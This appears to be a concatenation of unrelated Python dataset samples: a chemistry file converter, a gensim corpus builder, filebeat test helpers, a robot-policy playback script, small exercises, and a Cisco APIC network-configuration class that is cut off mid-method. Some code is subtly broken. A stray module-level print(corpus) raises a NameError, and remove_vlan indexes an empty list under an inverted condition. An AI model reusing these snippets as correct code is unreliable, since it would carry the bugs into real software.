        fout.write(udm.format_reaction(reaction, num_reactions <= 100))
    fout.write(' </REACTIONS>\n')
def write_udm_file(filename, reaction_entities):
    """Write filename UDM file for the given set of reactions."""
    with open(filename, 'wt') as fout:
        fout.write(udm.get_xml_declaration())
        # Fixed creation timestamp keeps the sample output reproducible.
        timestamp = format_timestamp(datetime.datetime(2018, 5, 14, 13, 34, 0), '+01:00')
        fout.write(udm.format_udm_open('SPRESI', 1, timestamp))
        fout.write(udm.format_version_entity(5, 0, 0))
        # Entities in the order the UDM schema expects them.
        write_udm_legal(fout)
        write_udm_citations(fout)
        write_udm_molecules(fout)
        write_udm_reactions(fout, reaction_entities)
        fout.write(udm.format_udm_close())
def main():
    """Main function for conversion of SPRESI RD file to UDM.

    Usage: prog [RDFILE [UDMFILE]]; defaults are used for missing arguments.
    """
    rd_filename = 'spresi-sample.rdf'  # Default input file if none specified.
    udm_filename = 'spresi.xml'  # Default output file if none specified.
    num_args = len(sys.argv)
    # argv[0] is the program name, so RDFILE is argv[1] and UDMFILE is argv[2].
    # The previous thresholds (>= 2 for argv[2], >= 1 for argv[1]) were off by
    # one and raised IndexError for zero or one argument.
    if num_args >= 3:
        udm_filename = sys.argv[2]
    if num_args >= 2:
        rd_filename = sys.argv[1]
    reaction_entities = []
    try:
        # Read all the reactions from the input file, register the involved
        # molecules and citations and store all the UDM-relevant information
        # in reaction_entities.
        num_reactions = 0
        for reaction in rdfile_reader(rd_filename):
            # We export only first 10K reactions from the SPRESI RD file provided
            # by InfoChem.
            num_reactions += 1
            if num_reactions > 10000:
                break
            reaction_entities.append(parse_spresi_reaction(reaction))
        write_udm_file(udm_filename, reaction_entities)
    except OSError as ose:
        # Was `except FileExistsError`, which is raised when *creating* an
        # existing file; a missing/unreadable input raises FileNotFoundError
        # or PermissionError, both covered by OSError.
        print('error: cannot read file ' + rd_filename, ose)
    except FileFormatException as ffe:
        print('error: cannot parse input file line ' + str(ffe.line_no) + ':', ffe)
| StarcoderdataPython |
6617359 | <gh_stars>1-10
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt", stopwords_path="stopwords_english.txt", save_dict_path="model_dict.dict", save_corpus_path="model_corpus.mm"):
    """Build and persist a gensim dictionary and bag-of-words corpus.

    Reads one document per line from `data_path`, removes stopwords and
    tokens occurring only once, then saves the Dictionary to `save_dict_path`
    and the serialized corpus to `save_corpus_path`.
    """
    # (The dead `documents = []` / `stoplist = []` pre-initializations and the
    # shadowing of the `file` builtin were removed.)
    with open(data_path, encoding="utf-8") as fh:
        documents = [l.strip() for l in fh]
    # A set makes the per-token membership test O(1) instead of O(len(stoplist)).
    with open(stopwords_path, encoding="utf-8") as fh:
        stoplist = {l.strip() for l in fh}
    texts = [[word for word in document.lower().split() if word not in stoplist]
             for document in documents]
    # remove words that appear only once
    from collections import defaultdict
    frequency = defaultdict(int)
    for text in texts:
        for token in text:
            frequency[token] += 1
    texts = [[token for token in text if frequency[token] > 1]
             for text in texts]
    from pprint import pprint  # pretty-printer
    pprint(texts)
    dictionary = corpora.Dictionary(texts)
    dictionary.save(save_dict_path)  # store the dictionary, for future reference
    print(dictionary)
    print(dictionary.token2id)
    corpus = [dictionary.doc2bow(text) for text in texts]
    corpora.MmCorpus.serialize(save_corpus_path, corpus)  # store to disk, for later use
    print(corpus)
print(corpus)
# build_lsi_model()
| StarcoderdataPython |
1673455 | <reponame>N0mansky/countbeat<filename>vendor/github.com/elastic/beats/filebeat/tests/system/filebeat.py<gh_stars>10-100
import json
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
class BaseTest(TestCase):
    """Common helpers for filebeat system tests (registry-file access)."""

    @classmethod
    def setUpClass(cls):
        # classmethods conventionally name their first parameter `cls`.
        cls.beat_name = "filebeat"
        cls.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
        super(BaseTest, cls).setUpClass()

    def get_registry(self):
        """Return the parsed registry file content, waiting until the file exists."""
        dotFilebeat = self.working_dir + '/registry'
        self.wait_until(cond=lambda: os.path.isfile(dotFilebeat))
        with open(dotFilebeat) as registry_file:  # no longer shadows builtin `file`
            return json.load(registry_file)

    def get_registry_entry_by_path(self, path):
        """
        Fetches the registry file and checks if an entry for the given path exists
        If the path exists, the state for the given path is returned
        If a path exists multiple times (which is possible because of file rotation)
        the most recent version is returned
        """
        registry = self.get_registry()
        tmp_entry = None
        # Checks all entries and returns the most recent one
        for entry in registry:
            if entry["source"] == path:
                # `is None` instead of `== None`; nested else/if flattened to elif.
                if tmp_entry is None:
                    tmp_entry = entry
                elif tmp_entry["timestamp"] < entry["timestamp"]:
                    tmp_entry = entry
        return tmp_entry
| StarcoderdataPython |
5105215 | <filename>cassie/env/play.py
import gym
import time
from stable_baselines3 import PPO
from stable_baselines3.common.vec_env import SubprocVecEnv
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.results_plotter import load_results, ts2xy, plot_results
from cassie import CassieRefEnv
# Roll out a saved PPO policy on the Cassie reference environment and render it.
if __name__ == '__main__':
    t = time.monotonic()
    # model = PPO.load("model_saved/ppo_cassie_"+str(512 * 9)+"00")
    model = PPO.load("ppo_cassie")
    # Dynamics randomization off: deterministic physics for playback.
    cassie = CassieRefEnv(dynamics_randomization=False)
    obs = cassie.reset()
    # print(obs)
    while True:
        action, _states = model.predict(obs)
        obs, rewards, dones, info = cassie.step(action)
        # Sleep-wait so each control step takes at least 60*0.0005 = 0.03 s of
        # wall time — presumably to keep rendering near real time (TODO confirm
        # the intended step rate).
        while time.monotonic() - t < 60*0.0005:
            time.sleep(0.0001)
        t = time.monotonic()
        cassie.render()
        # Restart the episode when the environment signals termination.
        if dones:
            obs = cassie.reset()
        # print(obs)
| StarcoderdataPython |
6463159 |
# Write a function that selects a random number and then asks the user to guess what that number is.
# They should be told if they are higher or lower than the result, track the number of guesses they take to get the correct value.
# If they do not guess correctly, ask them again until they do.
from random import randint


def my_function(target=None, low=0, high=100, input_fn=input, output_fn=print):
    """Play a number-guessing game and return the number of guesses taken.

    A secret number is drawn from [low, high] unless *target* is given.
    After each guess the player is told whether it was too low or too high
    and is re-prompted until the guess is correct.

    *input_fn* / *output_fn* default to the builtins so the game is
    interactive, but can be injected for testing.

    Fixes the original implementation, which compared the `randint`
    function object itself to integers (conditions were always False, so it
    always printed "answer is correct"), never read user input, never
    tracked guesses, and printed the secret number before playing.
    """
    if target is None:
        target = randint(low, high)  # secret number the player must find
    guesses = 0
    while True:
        guess = int(input_fn("try guess the number.."))
        guesses += 1
        if guess < target:
            output_fn("answer is to low")
            output_fn("guess again..")
        elif guess > target:
            output_fn("answer is to high")
            output_fn("guess again..")
        else:
            output_fn("answer is correct")
            return guesses


if __name__ == "__main__":
    # Guarded so importing this module does not start an interactive game.
    my_function()
| StarcoderdataPython |
6548735 | <gh_stars>0
# Is Unique
# Implement an algorithm to determine if a string has all unique characters.
# What if you cannot use additional data structures?
def isUnique(text_string):
    """Return True if every character in *text_string* occurs exactly once."""
    # A set collapses duplicates, so equal lengths mean all characters are
    # unique; return the comparison directly instead of if/return True/False.
    return len(set(text_string)) == len(text_string)
# Sort string approach
def isUniqueNoDS(text_string):
    """Return True if all characters in *text_string* are unique.

    Uses only sorting (no extra data structures beyond the sorted copy):
    in a sorted sequence, duplicates are always adjacent.
    """
    sorted_string = sorted(text_string)
    for index, char in enumerate(sorted_string):
        if index == 0:
            # BUG FIX: the original wrote bare `next` here — a no-op
            # expression, not `continue` — so index 0 fell through and was
            # compared against sorted_string[-1], making every 1-character
            # string report False.
            continue
        if char == sorted_string[index - 1]:
            return False
    return True
# Create your own hash table approach
# I read through the hints
if __name__ == "__main__":
    # Smoke-check the sort-based variant on one unique and one duplicate word.
    for sample in ("mango", "apple"):
        print(isUniqueNoDS(sample))
3326388 | """
L2 integration tool methods
"""
from cobra_apic_base import cobra_apic_base
from cobra.model.fv import Tenant, BD, Subnet, AEPg, Ap, RsProv, RsCons, RsDomAtt, RsPathAtt, RsCtx, RsPathAtt
from cobra.mit.request import ClassQuery
from cobra.modelimpl.fabric.protpol import ProtPol
from cobra.modelimpl.fvns.encapblk import EncapBlk
from cobra.modelimpl.infra.accportp import AccPortP
from cobra.modelimpl.infra.hports import HPortS
from cobra.modelimpl.infra.rsaccbasegrp import RsAccBaseGrp
from cobra.modelimpl.infra.rsaccportp import RsAccPortP
from cobra.modelimpl.infra.portblk import PortBlk
from cobra.modelimpl.infra.nodep import NodeP
from cobra.modelimpl.infra.leafs import LeafS
from cobra.modelimpl.infra.nodeblk import NodeBlk
from cobra.modelimpl.infra.accbndlgrp import AccBndlGrp
from cobra.modelimpl.infra.rsattentp import RsAttEntP
from cobra.modelimpl.infra.rshifpol import RsHIfPol
from cobra.modelimpl.infra.rsl2ifpol import RsL2IfPol
from cobra.modelimpl.infra.rslacppol import RsLacpPol
from cobra.modelimpl.infra.rslldpifpol import RsLldpIfPol
from cobra.modelimpl.infra.rsmcpifpol import RsMcpIfPol
from cobra.modelimpl.infra.rsmonifinfrapol import RsMonIfInfraPol
from cobra.modelimpl.infra.rsstormctrlifpol import RsStormctrlIfPol
from cobra.modelimpl.infra.rsstpifpol import RsStpIfPol
from cobra.modelimpl.infra.rscdpifpol import RsCdpIfPol
from cobra.modelimpl.fvns.vlaninstp import VlanInstP
from cobra.modelimpl.infra.rsvlanns import RsVlanNs
from cobra.modelimpl.phys.domp import DomP
from cobra.modelimpl.infra.attentityp import AttEntityP
from cobra.modelimpl.infra.rsdomp import RsDomP
from cobra.modelimpl.fabric.explicitgep import ExplicitGEp
from cobra.modelimpl.fabric.nodepep import NodePEp
from cobra.modelimpl.fabric.hifpol import HIfPol
from cobra.modelimpl.lacp.lagpol import LagPol
from cobra.modelimpl.cdp.ifpol import IfPol
from cobra.modelimpl.fv.ctx import Ctx
from cobra.modelimpl.infra.accportgrp import AccPortGrp
from cobra.mit.request import DnQuery
from cobra.modelimpl.fv.subnet import Subnet
from constant import *
import re
__author__ = '<NAME> (<EMAIL>)'
""" Helpers """
def natural_keys(text):
    """Key function for human/natural sorting, e.g. list.sort(key=natural_keys).

    Splits *text* into alternating non-digit and digit runs so that numeric
    parts compare as integers ("node-2" sorts before "node-11").
    """
    # Raw string fixes the invalid '\d' escape in the original pattern; the
    # capturing group keeps the digit runs in re.split()'s output.
    return [atoi(chunk) for chunk in re.split(r'(\d+)', text)]
def atoi(text):
    """Return int(text) when *text* is all digits, otherwise *text* unchanged."""
    if text.isdigit():
        return int(text)
    return text
""" All calls to APIC are done using the following class """
class cobra_apic_l2_tool(cobra_apic_base):
    def __init__(self):
        # Delegate connection/session setup to the generic APIC base class.
        cobra_apic_base.__init__(self)
    def create_network(self, network_o):
        """
        Create a network (VLAN) within the fabric.

        A network maps to an EPG plus a bridge domain associated to a
        VRF/context; the application profile and VRF are created on demand.
        :param network_o: object carrying .group (tenant dn), .name and .encapsulation (VLAN id)
        :return: the created EPG managed object
        """
        # Retrieve the tenant or group from the network object
        tenant_mo = self.moDir.lookupByDn(network_o.group)
        # Query the children below the tenant
        tenant_children = self.query_child_objects(network_o.group)
        # Filter the children in memory for the Ap objects with the expected name
        ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == AP_NAME,
                         tenant_children)
        # Check if application profile exists; if not, create one
        if len(ap_list) == 0:
            network_ap = self.create_ap(str(tenant_mo.dn), AP_NAME)
        else:
            network_ap = ap_list[0]
        # Creates bridge domain named after the VLAN
        bd_mo = self.create_bd('vlan' + str(network_o.encapsulation), tenant_mo, None)
        # Set BD parameters. These are needed so the bridge domain floods the VLAN packets across the fabric
        bd_mo.arpFlood = YES
        bd_mo.multiDstPktAct = BD_FLOOD
        bd_mo.unicastRoute = NO
        bd_mo.unkMacUcastAct = FLOOD
        bd_mo.unkMcastAct = FLOOD
        self.commit(bd_mo)
        # Filter the tenant children in memory for a Ctx (VRF) object with the
        # expected name
        tenant_ctxs = filter(lambda x: type(x).__name__ == 'Ctx' and x.name == VRF_NAME,
                             self.query_child_objects(str(tenant_mo.dn)))
        # check if vrf exists, if not creates one
        if len(tenant_ctxs) == 0:
            bd_ctx = self.create_vrf(tenant_mo.dn, VRF_NAME)
        else:
            bd_ctx = tenant_ctxs[0]
        # Filter the bridge domain children for the RsCtx (BD -> VRF) relation objects
        bd_cxts = filter(lambda x: type(x).__name__ == 'RsCtx',
                         self.query_child_objects(str(bd_mo.dn)))
        # Point the first RsCtx object at the context/vrf name to create the relationship
        if len(bd_cxts) > 0:
            bd_cxts[0].tnFvCtxName = bd_ctx.name
            self.commit(bd_cxts[0])
        # Create and return the EPG named after the network plus its VLAN id
        return self.create_epg(str(network_ap.dn), str(bd_mo.dn), network_o.name + VLAN_SUFIX +
                               str(network_o.encapsulation))
    def delete_network(self, network_o):
        """
        Remove a network from the fabric.

        Deletes the EPG and bridge domain created for the network; the
        application profile and VRF are left in place.
        :param network_o: object carrying .group (tenant dn), .name and .encapsulation
        :return:
        """
        tenant_mo = self.moDir.lookupByDn(network_o.group)
        # Filter the tenant children in memory for the Ap objects with the expected name
        ap_list = filter(lambda x: type(x).__name__ == 'Ap' and x.name == AP_NAME,
                         self.query_child_objects(str(tenant_mo.dn)))
        if len(ap_list) > 0:
            network_ap = ap_list[0]
            # Filter the application profile children for the network's EPG
            # (named <network>.<VLAN_SUFIX><vlan id>)
            network_epgs = filter(lambda x: type(x).__name__ == 'AEPg' and x.name == network_o.name + VLAN_SUFIX +
                                            str(network_o.encapsulation),
                                  self.query_child_objects(str(network_ap.dn)))
            # Removes EPG
            if len(network_epgs) > 0:
                network_epgs[0].delete()
                self.commit(network_epgs[0])
        # Filter the tenant children for the BD named after the VLAN
        bd_list = filter(lambda x: type(x).__name__ == 'BD' and x.name == VLAN + str(network_o.encapsulation),
                         self.query_child_objects(str(tenant_mo.dn)))
        if len(bd_list) > 0:
            # Removes bridge domain
            bd_list[0].delete()
            self.commit(bd_list[0])
def create_group(self, group_name):
"""
Creates a group/tenant
:param group_name:
:return:
"""
tenant_mo = self.create_tenant(group_name)
def delete_group(self, group_o):
"""
Removes a group/tenant from the fabric
:param group_o:
:return:
"""
class_query = ClassQuery('fvTenant')
class_query.propFilter = 'eq(fvTenant.name, "' + group_o.name + '")'
tenant_list = self.moDir.query(class_query)
if len(tenant_list) > 0:
tenant_list[0].delete()
self.commit(tenant_list[0])
def get_leafs(self):
"""
Returns the leafs that are registered in the APIC
:return:
"""
# Query leafs from the fabric
class_query = ClassQuery('fabricNode')
class_query.propFilter = 'eq(fabricNode.role, "leaf")'
leafs = self.moDir.query(class_query)
# creates two lists that will include the distinguished names and the relative names
result = []
dns = []
rns = []
for leaf in leafs:
dns.append(str(leaf.dn))
rns.append(str(leaf.rn))
# The following lines human sort the lists (e.g. 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
rns.sort(key=natural_keys)
result.append(dns)
result.append(rns)
# The result is a list with two lists inside. One list has distinguished names and the other the relative names
return result
def get_ports(self, leaf_dn):
"""
Return a list of ports within a leaf
:param leaf_dn:
:return:
"""
# Filters the leaf/sys children in memory looking for the ones that belongs to the PhysIf class
leaf_ports = filter(lambda x: type(x).__name__ == 'PhysIf', self.query_child_objects(leaf_dn + '/sys'))
# creates two lists that will include the distinguished names and the port identifiers
result = []
dns = []
port_ids = []
for port in leaf_ports:
dns.append(str(port.dn))
port_ids.append(port.id)
# The following lines human sort the lists (e.g. 1,2,3,11 and not 1,11,2,3)
dns.sort(key=natural_keys)
port_ids.sort(key=natural_keys)
# The result is a list with two lists inside. One list has distinguished names and the other the port
# identifiers
result.append(dns)
result.append(port_ids)
return result
def get_switch_by_port(self, port_dn):
"""
returns the switch that the port belongs
:param port_dn:
:return:
"""
port_mo = self.moDir.lookupByDn(port_dn)
switch_sys_mo = self.moDir.lookupByDn(port_mo.parentDn)
switch_mo = self.moDir.lookupByDn(switch_sys_mo.parentDn)
return switch_mo
def get_vpcs(self):
"""
returns all virtual port channel within the fabric
:return:
"""
class_query = ClassQuery('fabricProtPathEpCont')
vpc_containers = self.moDir.query(class_query)
vpc_list = []
for container in vpc_containers:
for vdc in self.query_child_objects(str(container.dn)):
vpc_list.append(vdc)
return vpc_list
def associate_epg_vpc(self, epg_dn, vpc_dn, vlan_number):
"""
Creates an static binding between a virtual port channel and an end point group
:param epg_dn:
:param vpc_dn:
:param vlan_number:
:return:
"""
rspath = RsPathAtt(epg_dn, vpc_dn, encap=VLAN_PREFIX + str(vlan_number))
self.commit(rspath)
    def associate_epg_physical_domain(self, epg_dn, physical_domain_name):
        """
        Associate a physical domain to an end point group.

        If the physical domain does not exist yet, it is created together
        with a static VLAN pool and an attachable entity profile.
        :param epg_dn: EPG distinguished name
        :param physical_domain_name: bare name (PD_PREFIX is prepended)
        :return:
        """
        # Query the physical domain by its (prefixed) name
        class_query = ClassQuery('physDomP')
        class_query.propFilter = 'eq(physDomP.name, "' + PD_PREFIX + physical_domain_name + '")'
        pd_list = self.moDir.query(class_query)
        # If the physical domain does not exist, create it with the vlan pool and the attachable entity profile
        if len(pd_list) == 0:
            vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + physical_domain_name, 'static')
            DomP_mo = self.create_physical_domain(PD_PREFIX + physical_domain_name, str(vlan_pool_mo.dn))
            self.create_attachable_entity_profile(AEP_PREFIX + physical_domain_name, str(DomP_mo.dn))
        else:
            DomP_mo = pd_list[0]
        # Create and commit the EPG -> physical domain association
        rsdom = RsDomAtt(epg_dn, str(DomP_mo.dn))
        self.commit(rsdom)
def get_vpc_assignments_by_epg(self, epg_dn):
"""
Returns all virtual port channel that are assigned to an specific end point group
:param epg_dn:
:return:
"""
# Filters the EPG children in memory looking for the ones that belongs to the RsPathAtt class and are
# virtual port channels
return filter(lambda x: type(x).__name__ == 'RsPathAtt' and 'topology/pod-1/protpaths' in str(x.tDn),
self.query_child_objects(epg_dn))
def delete_vpc_assignment(self, rspathattr_dn):
"""
Removes the assignment of a vpc within and end point group
:param rspathattr_dn:
:return:
"""
fv_rspathattr_mo = self.moDir.lookupByDn(rspathattr_dn)
if fv_rspathattr_mo is not None:
fv_rspathattr_mo.delete()
self.commit(fv_rspathattr_mo)
    def create_single_access(self, epg_dn, switch_dn, port_dn, vlan_number, aep_name,
                             if_policy_group_name, switch_p_name):
        """
        Statically bind a single port to an end point group.

        Creates the interface policy group, the interface profile and the
        switch profile the binding requires, then commits the static path
        attachment itself.
        :param epg_dn: EPG distinguished name
        :param switch_dn: leaf switch distinguished name
        :param port_dn: port distinguished name
        :param vlan_number: encapsulation VLAN
        :param aep_name: attachable entity profile name (created if missing)
        :param if_policy_group_name: name for the interface policy group
        :param switch_p_name: name for the switch profile
        :return:
        """
        # Creates interface policy group
        if_policy_group = self.create_if_policy_group(if_policy_group_name, aep_name)
        # Creates interface profile
        if_profile = self.create_interface_profile(port_dn,if_policy_group.dn)
        # Creates switch profile
        self.create_single_access_switch_profile(switch_dn, if_profile.dn, switch_p_name)
        # Derive the fabric path dn from the port dn, then commit the static binding
        fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
        rspathatt_mo = RsPathAtt(epg_dn, fabric_path_dn, encap=VLAN_PREFIX + str(vlan_number))
        self.commit(rspathatt_mo)
    def create_single_access_switch_profile(self, switch_dn, if_profile_dn, switch_p_name):
        """
        Create a switch profile for a specific interface profile and switch.
        :param switch_dn: leaf switch distinguished name
        :param if_profile_dn: interface profile to attach to the profile
        :param switch_p_name: name of the new switch profile
        :return:
        """
        # Create switch profile
        switch_mo = self.moDir.lookupByDn(switch_dn)
        switch_p_mo = NodeP('uni/infra/', switch_p_name)
        self.commit(switch_p_mo)
        # Add switch selector with a node block covering exactly this node id
        switch_selector_mo = LeafS(str(switch_p_mo.dn), str(switch_mo.rn), 'range')
        self.commit(switch_selector_mo)
        node_block_mo = NodeBlk(switch_selector_mo.dn, str(switch_mo.rn) + NB_SUFIX, from_=switch_mo.id, to_=switch_mo.id)
        self.commit(node_block_mo)
        # Attach the interface profile to the switch profile
        rs_acc_port_p_mo = RsAccPortP(switch_p_mo.dn, if_profile_dn)
        self.commit(rs_acc_port_p_mo)
    def create_interface_profile(self, port_dn, if_group_profile_dn):
        """
        Create the interface profile (selector + port block) for a port and
        bind it to an interface policy group.
        :param port_dn: port distinguished name
        :param if_group_profile_dn: interface policy group to bind
        :return: the created interface profile managed object
        """
        # Create interface profile named after the port number (eth1/5 -> 5)
        port_mo = self.moDir.lookupByDn(port_dn)
        interface_p = AccPortP('uni/infra/', 'single_access_' + str(port_mo.id).split('/')[1])
        self.commit(interface_p)
        # Create interface selector
        if_sel_mo = HPortS(interface_p.dn, PORT_PREFIX + str(port_mo.id).split('/')[1], 'range')
        self.commit(if_sel_mo)
        # Assign interface selector to interface policy group
        rs_access_base_group_mo = RsAccBaseGrp(if_sel_mo.dn, tDn=str(if_group_profile_dn))
        self.commit(rs_access_base_group_mo)
        # Create port block covering exactly this card/port (eth1/5 -> card 1, port 5)
        port_blk_mo = PortBlk(if_sel_mo.dn, str(port_mo.id).replace('/', '-'),
                              fromCard=str(port_mo.id).split('/')[0].replace('eth', ''),
                              fromPort=str(port_mo.id).split('/')[1],
                              toCard=str(port_mo.id).split('/')[0].replace('eth', ''),
                              toPort=str(port_mo.id).split('/')[1])
        self.commit(port_blk_mo)
        return interface_p
    def create_if_policy_group(self, name, aep_name):
        """
        Create an interface policy group, associate it to an attachable
        entity profile, and wire up the standard interface policies.
        :param name: interface policy group name
        :param aep_name: attachable entity profile. If it does not exist the system will create it
        :return: the created policy group managed object
        """
        # Creates policy group
        if_policy_group_mo = AccPortGrp('uni/infra/funcprof/', name)
        self.commit(if_policy_group_mo)
        # Query the AEP
        class_query = ClassQuery('infraAttEntityP')
        class_query.propFilter = 'eq(infraAttEntityP.name, "' + AEP_PREFIX + aep_name + '")'
        pd_list = self.moDir.query(class_query)
        if len(pd_list) == 0:
            # if attachable entity profile does not exist, create a new one
            # together with its vlan pool and physical domain
            vlan_pool_mo = self.create_vlan_pool('vlan-pool-' + aep_name, 'static')
            DomP_mo = self.create_physical_domain('pd-' + aep_name, str(vlan_pool_mo.dn))
            AttEntityP_mo = self.create_attachable_entity_profile('aep-' + aep_name, str(DomP_mo.dn))
        else:
            AttEntityP_mo = pd_list[0]
        # Assign attached entity profile to the policy group
        self.commit(
            RsAttEntP(if_policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))
        )
        # Assign interface policies. For non-defaults, check if already created; if not, create them
        IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')
        if not IfPolmo:
            IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')
            self.commit(IfPolmo)
        self.commit(
            RsCdpIfPol(if_policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)
        )
        HIfPolmo = self.moDir.lookupByDn('uni/infra/hintfpol-1GB')
        if not HIfPolmo:
            HIfPolmo = HIfPol('uni/infra', '1GB', speed='1G')
            self.commit(HIfPolmo)
        self.commit(
            RsHIfPol(if_policy_group_mo.dn, tnFabricHIfPolName=HIfPolmo.name)
        )
        self.commit(
            RsL2IfPol(if_policy_group_mo.dn, tnL2IfPolName='default')
        )
        self.commit(
            RsLldpIfPol(if_policy_group_mo.dn, tnLldpIfPolName='default')
        )
        self.commit(
            RsMcpIfPol(if_policy_group_mo.dn, tnMcpIfPolName='default')
        )
        self.commit(
            RsMonIfInfraPol(if_policy_group_mo.dn, tnMonInfraPolName='default')
        )
        self.commit(
            RsStormctrlIfPol(if_policy_group_mo.dn, tnStormctrlIfPolName='default')
        )
        self.commit(
            RsStpIfPol(if_policy_group_mo.dn, tnStpIfPolName='default')
        )
        return if_policy_group_mo
    def delete_single_access(self, epg_dn, port_dn, if_policy_group_name, switch_p_name):
        """
        Remove the static binding between a port and an end point group.

        If no other EPG is using the port, also remove the switch profile,
        interface profile and interface policy group created for it.
        :param epg_dn: EPG distinguished name
        :param port_dn: port distinguished name
        :param if_policy_group_name: interface policy group to clean up
        :param switch_p_name: switch profile to clean up
        :return:
        """
        fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
        # Find the EPG's static binding (RsPathAtt) pointing at this port
        rspathatt_list = filter(lambda x: type(x).__name__ == 'RsPathAtt' and str(x.tDn) == fabric_path_dn,
                                self.query_child_objects(epg_dn))
        if len(rspathatt_list) > 0:
            # Removes the static binding
            rspathatt_list[0].delete()
            self.commit(rspathatt_list[0])
        # If there is no other assignment to this port, the switch profiles and policy groups are removed
        fabric_path_dn = port_dn.replace('node', 'paths').replace('sys/phys', 'pathep')
        class_query = ClassQuery('fvRsPathAtt')
        # Search fabric-wide for any remaining fvRsPathAtt still using the port
        RsPathAtt_list = filter(lambda x: str(fabric_path_dn) in str(x.tDn),
                                self.moDir.query(class_query))
        if len(RsPathAtt_list) == 0:
            # Remove policy group
            class_query = ClassQuery('infraAccPortGrp')
            class_query.propFilter = 'eq(infraAccPortGrp.name, "' + if_policy_group_name + '")'
            policy_groups = self.moDir.query(class_query)
            if len(policy_groups) > 0:
                policy_groups[0].delete()
                self.commit(policy_groups[0])
            # Remove interface profile (named by create_interface_profile)
            port_mo = self.moDir.lookupByDn(port_dn)
            class_query = ClassQuery('infraAccPortP')
            class_query.propFilter = 'eq(infraAccPortP.name, "single_access_' + str(port_mo.id).split('/')[1] + '")'
            interface_profiles = self.moDir.query(class_query)
            if len(interface_profiles) > 0:
                interface_profiles[0].delete()
                self.commit(interface_profiles[0])
            # Remove switch profile
            class_query = ClassQuery('infraNodeP')
            class_query.propFilter = 'eq(infraNodeP.name, "' + switch_p_name + '")'
            switch_profiles = self.moDir.query(class_query)
            if len(switch_profiles) > 0:
                switch_profiles[0].delete()
                self.commit(switch_profiles[0])
    def add_vlan(self, vlan_number, vlan_pool_name):
        """
        Add a VLAN to a VLAN pool.
        :param vlan_number: VLAN id to add
        :param vlan_pool_name: Vlan pool name. If it does not exist the system will create one.
        :return:
        """
        class_query = ClassQuery('fvnsVlanInstP')
        class_query.propFilter = 'eq(fvnsVlanInstP.name, "' + VLAN_POOL_PREFIX + vlan_pool_name + '")'
        vp_list = self.moDir.query(class_query)
        # If the vlan pool does not exist, create it with the physical domain and the attachable entity profile
        if len(vp_list) == 0:
            VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')
            DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))
            self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))
        else:
            VlanInstP_mo = vp_list[0]
        # A one-VLAN encapsulation block (from == to) represents the single VLAN
        encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),
                            VLAN_PREFIX + str(vlan_number), allocMode='static')
        self.commit(encap_mo)
def remove_vlan(self, vlan_number, vlan_pool_name):
"""
Removes a VLAN from a vlan pool
:param vlan_number:
:param vlan_pool_name:
:return:
"""
class_query = ClassQuery('fvnsVlanInstP')
class_query.propFilter = 'eq(fvnsVlanInstP.name, "' + VLAN_POOL_PREFIX + vlan_pool_name + '")'
vp_list = self.moDir.query(class_query)
# Check if vlan pool exists
if len(vp_list) == 0:
vlan_pool_children = self.query_child_objects(str(vp_list[0].dn))
for vlan in vlan_pool_children:
if vlan.to == 'vlan-' + str(vlan_number):
vlan.delete()
self.commit(vlan)
break
    def create_vpc_interface_profile(self, port_dn, if_group_profile_dn, name):
        """
        Create an interface profile (selector + port block) to be used for a
        virtual port channel.
        :param port_dn: member port distinguished name
        :param if_group_profile_dn: VPC interface policy group to bind
        :param name: prefix for the interface profile name
        :return: the created interface profile managed object
        """
        # Create interface profile named <name><VPC_PORT_PREFIX><port number>
        port_mo = self.moDir.lookupByDn(port_dn)
        interface_p = AccPortP('uni/infra/', name + VPC_PORT_PREFIX + str(port_mo.id).split('/')[1])
        self.commit(interface_p)
        # Create interface selector
        if_sel_mo = HPortS(interface_p.dn, PORT_PREFIX + str(port_mo.id).split('/')[1], 'range')
        self.commit(if_sel_mo)
        # Assign interface selector to interface policy group
        rs_access_base_group_mo = RsAccBaseGrp(if_sel_mo.dn, tDn=str(if_group_profile_dn))
        self.commit(rs_access_base_group_mo)
        # Create port block covering exactly this card/port
        port_blk_mo = PortBlk(if_sel_mo.dn, str(port_mo.id).replace('/', '-'),
                              fromCard=str(port_mo.id).split('/')[0].replace('eth', ''),
                              fromPort=str(port_mo.id).split('/')[1],
                              toCard=str(port_mo.id).split('/')[0].replace('eth', ''),
                              toPort=str(port_mo.id).split('/')[1])
        self.commit(port_blk_mo)
        return interface_p
    def create_vpc_if_policy_group(self, name, aep_name):
        """
        Create a virtual port channel interface policy group and wire up its
        attachable entity profile and interface policies.
        :param name: policy group name
        :param aep_name: attachable entity profile name. If it does not exist the system will create a new one
        :return: the created policy group managed object
        """
        # lagT='node' makes this a VPC (node-level) bundle group
        policy_group_mo = AccBndlGrp('uni/infra/funcprof/', name, lagT='node')
        self.commit(policy_group_mo)
        # if attachable entity profile does not exist, create a new one
        class_query = ClassQuery('infraAttEntityP')
        class_query.propFilter = 'eq(infraAttEntityP.name, "' + AEP_PREFIX + aep_name + '")'
        pd_list = self.moDir.query(class_query)
        if len(pd_list) == 0:
            vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + aep_name, 'static')
            DomP_mo = self.create_physical_domain(PD_PREFIX + aep_name, str(vlan_pool_mo.dn))
            AttEntityP_mo = self.create_attachable_entity_profile(AEP_PREFIX + aep_name, str(DomP_mo.dn))
        else:
